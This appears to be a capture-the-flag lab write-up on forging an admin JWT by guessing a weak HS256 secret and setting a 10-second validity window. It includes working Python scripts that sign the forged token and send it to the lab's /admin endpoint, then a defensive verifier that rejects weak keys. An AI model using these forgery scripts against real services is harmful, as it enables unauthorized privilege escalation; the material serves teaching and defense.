Step 1: Click on the green button to Start the Lab
Step 2: Hack the URL or IP of the lab
Step 3: Use your skills and logic to find the flags!
This challenge requires manipulating JWT claims while respecting strict time constraints. You must create a valid JWT with admin privileges where the token validity window (exp - iat) does not exceed 10 seconds, and the token must be valid at the current time.
<target-ip>
{"alg": "HS256", "typ": "JWT"}
{"sub": "user123", "role": "user", "iat": [timestamp], "exp": [timestamp + 3600]}
For this daily challenge, the JWT secret is intentionally weak for educational purposes. Try common weak secrets:
You'll need Python with the PyJWT library to manipulate JWT tokens:
# Install PyJWT library
pip install PyJWT
# Verify installation
python -c "import jwt; print('JWT library ready')"
Create a Python script to generate a valid admin JWT with proper time constraints:
#!/usr/bin/env python3
import jwt
import time
# JWT secret (discovered from weak password testing)
secret = "secret"
# Get current timestamp for precise timing
current_time = int(time.time())
# Create admin payload with 10-second validity window
payload = {
    "sub": "user123",          # Keep original subject
    "role": "admin",           # CHANGE: user → admin
    "iat": current_time,       # CHANGE: issued now
    "exp": current_time + 10   # CHANGE: expires in 10 seconds
}
# Generate properly signed JWT
admin_jwt = jwt.encode(payload, secret, algorithm="HS256")
print("Generated Admin JWT:")
print(admin_jwt)
print(f"\nToken valid from {current_time} to {current_time + 10}")
print(f"Current time: {int(time.time())}")
print("\nQuickly paste this token into the challenge!")
If the attack is successful, you'll see:
This message indicates you've successfully manipulated the JWT claims and bypassed the authentication system!
For even faster execution, create an automated script that generates and tests the token:
#!/usr/bin/env python3
import jwt
import time
import requests
secret = "secret"
target_url = "http://<target-ip>"
current_time = int(time.time())
payload = {
    "sub": "user123",
    "role": "admin",
    "iat": current_time,
    "exp": current_time + 10
}
admin_jwt = jwt.encode(payload, secret, algorithm="HS256")
# Immediately test the token (timeout kept below the 10-second validity window)
response = requests.get(f"{target_url}/admin",
                        headers={"Authorization": f"Bearer {admin_jwt}"},
                        timeout=5)
if response.status_code == 200:
    print("SUCCESS! Admin access granted!")
    print(response.json())
else:
    # Print the raw body: an error response is not guaranteed to be JSON
    print(f"Failed: {response.text}")
This challenge demonstrates how weak JWT secrets combined with claims manipulation can lead to privilege escalation. The time constraint adds realism, simulating scenarios where tokens have short validity periods. Understanding these vulnerabilities helps developers implement more secure JWT-based authentication systems.
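On the defensive side, the short validity window only helps once the signing key cannot be guessed. The following is an added example, not code from the lab or its server: a standard-library HS256 issuer and verifier that refuses short keys, pins the algorithm, and enforces the same `exp - iat <= 10` rule. `MIN_KEY_BYTES`, the function names and the sample values are assumptions made for illustration.

```python
import base64, hashlib, hmac, json, time

MAX_WINDOW = 10      # seconds; the exp - iat limit stated in the challenge
MIN_KEY_BYTES = 32   # assumption: key at least as long as the SHA-256 output

def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))

def check_key(key: bytes) -> None:
    # Reject keys like b"secret"; real keys should come from secrets.token_bytes(32).
    if len(key) < MIN_KEY_BYTES or len(set(key)) < 16:
        raise ValueError("signing key is too short or low-variety")

def _mac(signing_input: str, key: bytes) -> bytes:
    return hmac.new(key, signing_input.encode(), hashlib.sha256).digest()

def sign(claims: dict, key: bytes) -> str:
    check_key(key)
    header = b64url(json.dumps({"alg": "HS256", "typ": "JWT"}).encode())
    body = b64url(json.dumps(claims).encode())
    return f"{header}.{body}.{b64url(_mac(f'{header}.{body}', key))}"

def verify(token: str, key: bytes, now=None) -> dict:
    check_key(key)
    now = int(time.time()) if now is None else now
    header_b64, body_b64, sig_b64 = token.split(".")  # wrong part count -> ValueError
    # Pin the algorithm instead of trusting whatever the header asks for.
    if json.loads(b64url_decode(header_b64)).get("alg") != "HS256":
        raise ValueError("unexpected algorithm")
    # Constant-time comparison of the recomputed MAC with the presented one.
    if not hmac.compare_digest(_mac(f"{header_b64}.{body_b64}", key),
                               b64url_decode(sig_b64)):
        raise ValueError("bad signature")
    claims = json.loads(b64url_decode(body_b64))
    iat, exp = claims.get("iat"), claims.get("exp")
    if not (isinstance(iat, int) and isinstance(exp, int)):
        raise ValueError("iat and exp must be integers")
    # Same rule as the lab: window of at most 10 s, and valid right now.
    if not (0 < exp - iat <= MAX_WINDOW and iat <= now < exp):
        raise ValueError("token outside its validity window")
    return claims
```

With a key that passes `check_key`, a token carrying the altered claims but signed with `"secret"` stops at the signature check, so the timing checks never have to carry the defense alone.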